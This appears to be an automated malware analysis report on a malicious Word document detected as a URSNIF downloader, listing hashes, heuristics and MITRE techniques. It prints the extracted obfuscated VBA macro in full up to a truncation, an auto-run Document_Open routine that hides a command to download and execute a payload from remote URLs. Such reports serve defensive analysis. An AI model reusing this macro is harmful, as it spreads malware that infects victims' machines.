Office (OLE) malware analysis — malicious · 6a1db36afe15df2d

MALICIOUS

Office (OLE)

72.1 KB Created: 2018-09-06 17:47:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 7b145c7037c4398e66b2e54717e7da96 SHA-1: c9273a2c85f0a221e0170e8f920dc1115daefa17 SHA-256: 6a1db36afe15df2d17dad29ecd8f411d20ce6bda24bf07eb3df9d9a17b151ff6

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5110 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5110 bytes
SHA-256: `7f27ad2e23197737df14849728f0c2ab11718232dc14586184b0065ceac1dd0a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "NQuULHvUiRvqd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Shell Format(DOViAi) + MRrYQWZrtlb + VWbPPmALV + kpXDLDdw + NibLhuDmK + DfLLtpfOqMViK + XspzmjzEirt, vbHide End Sub Attribute VB_Name = "lspTrBBUk" Function kpXDLDdw() On _ Error _ Resume _ Next Month "501542088" + "zq" Month "wN" + "c" + "pczGWMnwH" + "PT" Month "ljiG" + "YcS" GzaDfMfTjjt = Chr(8 + 2 + 17 + 18 + 54) + "md" + " " + "/" + "V^:" + "^O/" + Chr(5 + 1 + 11 + 12 + 38) + Chr(2 + 0 + 5 + 5 + 22) + "^s" + "^et" + " ^" Month "zpBZKzYdf" + "wAvi" + "wOw" + "pd" YuTkdUj = "EO^" + "t" + "= ^ ^ " + " ^ " + "^ " + " ^" + " ^ ^" + " " + "^ " + "}}" + "^" + "{h" + Chr(8 + 2 + 17 + 18 + 54) + "ta" + Chr(8 + 2 + 17 + 18 + 54) Month "jHYN" + "369315574" Month "sCjp" + "dDpSRHi" UWMFjHCsA = "^}" + "^" + ";" + "k^ae" + "r^b^;^" + "H^uv" + "$^ " + "me^" + "tI^-eko" + "vnI;)Hu" + "v$^ " Month "dJSGRzPhanO" + "240977385" Month "373096314" + "u" + "ijI" + "jDB" Month "315223330" + "jjcYZOWP" Month "id" + "319434404" + "jkUPzQQ" + "2841" EXKambtEwXY = "," + "^k^SV^" + "$(^" + "el" + "i^F" + "^" + "d^a^ol" + "n^w" + "oD^." + Chr(5 + 1 + 11 + 12 + 38) Month "NYspJNIiB" + "3447" + "6956" + "276049525" fnlJRXuri = "u^Y${y" + "r^t{)^z" + "wD^" + "$^" + " n^i k^" + "S" + "V" + "^$(^" + "h" + Chr(8 + 2 + 17 + 18 + 54) + "a^er^" + "o" + "f^;^'^e" + "^x" Month "bG" + "cvI" + "BcK" + "bLYbIN" Month "EpFWpHREmmf" + "534289160" Month "3425" + "509625931" + "499993792" + "otGP" Month "Jj" + "H" nYdBwGdj = "e.^'^" + "+" + "^z^G" + "E$" + "^" + "+'\^" Month "95365227" + "18503586" Month "4949" + "423505608" + "499802867" + "6676" Month "FaWCGrv" + "jlO" + "njb" + "134683186" DhFpAnwz = "'^+" + Chr(8 + 2 + 17 + 18 + 54) + "^i^l" + "^" + "bup^:vn" + "^e$" + "=" + "^H" + "^uv" + "$;^" + "'6" + "^0^2" + "' ^=^" Month "V" + "113054156" Month "dG" + "tQLUWnBSfRIV" + "A" + "G" cPGqGRwMpBZ = " z^" + "G^E" + "^$;)^'" + "^@^'(" + "ti^lp" + "^S^" + ".^'^Ob" + "/m^o" + Chr(8 + 2 + 17 + 18 + 54) + "^" Month "kMClvhBP" + "Fii" + "KLhk" + "8045" auYRQws = ".r^et" + "ra" + Chr(8 + 2 + 17 + 18 + 54) + "^mj" + "a//^" + ":^p^tt^" + "h^@" + "46/r^b^" + "." kpXDLDdw = GzaDfMfTjjt + YuTkdUj + UWMFjHCsA + EXKambtEwXY + fnlJRXuri + nYdBwGdj + DhFpAnwz + cPGqGRwMpBZ + auYRQws Month "DUGnjfYG" + "MH" End Function Function NibLhuDmK() On _ Error _ Resume _ Next Month "490935583" + "485398599" + "jzSk" + "URQoDqVo" Month "PGPBP" + "277265715" + "uwQ" + "dMud" Month "329915906" + "168670823" + "LSRK" + "349860888" OuIALhdGYdV = "m^o" + Chr(8 + 2 + 17 + 18 + 54) + ".o" + "^a" + Chr(8 + 2 + 17 + 18 + 54) + "^iu" + "b^irt^s" + "^" + "id^" + "3f//:" + "^pt" + "^th^@b" + "F^A/t" + "en.n^e^" + "w^i^" + "ly" Month "MaZnfCwOq" + "LGuqqstQs" + "j" + "1553" Month "1551" + "7453" sXfCcEsB = "r" + "rah/" + "/:pt^t" + "h^@KeYJ" + "^0/^m^o" + Chr(8 + 2 + 17 + 18 + 54) + "." + "^ayn^" + "-nah/" Month "92930887" + "YFNIu" Month "cjsWH" + "TAMT" Month "9355" + "vSFkDlk" + "341292928" + "S" kEJCqsNzZMz = "/^:p" + "^tth@D^" + "a^W^" + "b" + "/^m^" + "o" + Chr(8 + 2 + 17 + 18 + 54) + "^.su^f" + "e^e^g^" + "d" Month "ODV" + "z" + "8590" + "292201913" Month "jpk" + "DjmYCzapt" Month "w" + "bKbkF" QPdpE = "l" + "o//:" + "ptt" + "^" + "h^'=^zw" + "^D^$;^t" + "ne^i^" Month "DVWAPdGjjc" + "230389199" Month "hisfddS" + "iQwDzJQCO" Month "203060380" + "h" UKOfiX = "l" + Chr(5 + 1 + 11 + 12 + 38) + "b" + "e^W." + "^t" + "^eN^ t" + Chr(8 + 2 + 17 + 18 + 54) + "^e^jbo-" Month "PiosD" + "APb" Month "338398112" + "157489204" + "mkS" + "UBtr" Month "cucCEFlFvYRGBs" + "XmZqFad" + "6251766" + "ZzB" Month "43386783" + "rHa" + "KBWmFkpsjSZH" + "QZvvFXHz" WtFbdT = "w" + "^en^=" + Chr(5 + 1 + 11 + 12 + 38) + "uY$^ " + ... (truncated)

SHA-256: 7f27ad2e23197737df14849728f0c2ab11718232dc14586184b0065ceac1dd0a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "NQuULHvUiRvqd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(DOViAi) + MRrYQWZrtlb + VWbPPmALV + kpXDLDdw + NibLhuDmK + DfLLtpfOqMViK + XspzmjzEirt, vbHide
End Sub



Attribute VB_Name = "lspTrBBUk"
Function kpXDLDdw()

On _
Error _
Resume _
Next
Month "501542088" + "zq"
   Month "wN" + "c" + "pczGWMnwH" + "PT"
   Month "ljiG" + "YcS"
GzaDfMfTjjt = Chr(8 + 2 + 17 + 18 + 54) + "md" + " " + "/" + "V^:" + "^O/" + Chr(5 + 1 + 11 + 12 + 38) + Chr(2 + 0 + 5 + 5 + 22) + "^s" + "^et" + " ^"
Month "zpBZKzYdf" + "wAvi" + "wOw" + "pd"
YuTkdUj = "EO^" + "t" + "= ^ ^ " + " ^ " + "^ " + "   ^" + "  ^  ^" + " " + "^   " + "}}" + "^" + "{h" + Chr(8 + 2 + 17 + 18 + 54) + "ta" + Chr(8 + 2 + 17 + 18 + 54)
Month "jHYN" + "369315574"
   Month "sCjp" + "dDpSRHi"
UWMFjHCsA = "^}" + "^" + ";" + "k^ae" + "r^b^;^" + "H^uv" + "$^ " + "me^" + "tI^-eko" + "vnI;)Hu" + "v$^ "
Month "dJSGRzPhanO" + "240977385"
   Month "373096314" + "u" + "ijI" + "jDB"
   Month "315223330" + "jjcYZOWP"
   Month "id" + "319434404" + "jkUPzQQ" + "2841"
EXKambtEwXY = "," + "^k^SV^" + "$(^" + "el" + "i^F" + "^" + "d^a^ol" + "n^w" + "oD^." + Chr(5 + 1 + 11 + 12 + 38)
Month "NYspJNIiB" + "3447" + "6956" + "276049525"
fnlJRXuri = "u^Y${y" + "r^t{)^z" + "wD^" + "$^" + " n^i k^" + "S" + "V" + "^$(^" + "h" + Chr(8 + 2 + 17 + 18 + 54) + "a^er^" + "o" + "f^;^'^e" + "^x"
Month "bG" + "cvI" + "BcK" + "bLYbIN"
   Month "EpFWpHREmmf" + "534289160"
   Month "3425" + "509625931" + "499993792" + "otGP"
   Month "Jj" + "H"
nYdBwGdj = "e.^'^" + "+" + "^z^G" + "E$" + "^" + "+'\^"
Month "95365227" + "18503586"
   Month "4949" + "423505608" + "499802867" + "6676"
   Month "FaWCGrv" + "jlO" + "njb" + "134683186"
DhFpAnwz = "'^+" + Chr(8 + 2 + 17 + 18 + 54) + "^i^l" + "^" + "bup^:vn" + "^e$" + "=" + "^H" + "^uv" + "$;^" + "'6" + "^0^2" + "' ^=^"
Month "V" + "113054156"
   Month "dG" + "tQLUWnBSfRIV" + "A" + "G"
cPGqGRwMpBZ = " z^" + "G^E" + "^$;)^'" + "^@^'(" + "ti^lp" + "^S^" + ".^'^Ob" + "/m^o" + Chr(8 + 2 + 17 + 18 + 54) + "^"
Month "kMClvhBP" + "Fii" + "KLhk" + "8045"
auYRQws = ".r^et" + "ra" + Chr(8 + 2 + 17 + 18 + 54) + "^mj" + "a//^" + ":^p^tt^" + "h^@" + "46/r^b^" + "."
kpXDLDdw = GzaDfMfTjjt + YuTkdUj + UWMFjHCsA + EXKambtEwXY + fnlJRXuri + nYdBwGdj + DhFpAnwz + cPGqGRwMpBZ + auYRQws
   Month "DUGnjfYG" + "MH"
End Function
Function NibLhuDmK()

On _
Error _
Resume _
Next
Month "490935583" + "485398599" + "jzSk" + "URQoDqVo"
   Month "PGPBP" + "277265715" + "uwQ" + "dMud"
   Month "329915906" + "168670823" + "LSRK" + "349860888"
OuIALhdGYdV = "m^o" + Chr(8 + 2 + 17 + 18 + 54) + ".o" + "^a" + Chr(8 + 2 + 17 + 18 + 54) + "^iu" + "b^irt^s" + "^" + "id^" + "3f//:" + "^pt" + "^th^@b" + "F^A/t" + "en.n^e^" + "w^i^" + "ly"
Month "MaZnfCwOq" + "LGuqqstQs" + "j" + "1553"
   Month "1551" + "7453"
sXfCcEsB = "r" + "rah/" + "/:pt^t" + "h^@KeYJ" + "^0/^m^o" + Chr(8 + 2 + 17 + 18 + 54) + "." + "^ayn^" + "-nah/"
Month "92930887" + "YFNIu"
   Month "cjsWH" + "TAMT"
   Month "9355" + "vSFkDlk" + "341292928" + "S"
kEJCqsNzZMz = "/^:p" + "^tth@D^" + "a^W^" + "b" + "/^m^" + "o" + Chr(8 + 2 + 17 + 18 + 54) + "^.su^f" + "e^e^g^" + "d"
Month "ODV" + "z" + "8590" + "292201913"
   Month "jpk" + "DjmYCzapt"
   Month "w" + "bKbkF"
QPdpE = "l" + "o//:" + "ptt" + "^" + "h^'=^zw" + "^D^$;^t" + "ne^i^"
Month "DVWAPdGjjc" + "230389199"
   Month "hisfddS" + "iQwDzJQCO"
   Month "203060380" + "h"
UKOfiX = "l" + Chr(5 + 1 + 11 + 12 + 38) + "b" + "e^W." + "^t" + "^eN^ t" + Chr(8 + 2 + 17 + 18 + 54) + "^e^jbo-"
Month "PiosD" + "APb"
   Month "338398112" + "157489204" + "mkS" + "UBtr"
   Month "cucCEFlFvYRGBs" + "XmZqFad" + "6251766" + "ZzB"
   Month "43386783" + "rHa" + "KBWmFkpsjSZH" + "QZvvFXHz"
WtFbdT = "w" + "^en^=" + Chr(5 + 1 + 11 + 12 + 38) + "uY$^ " +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.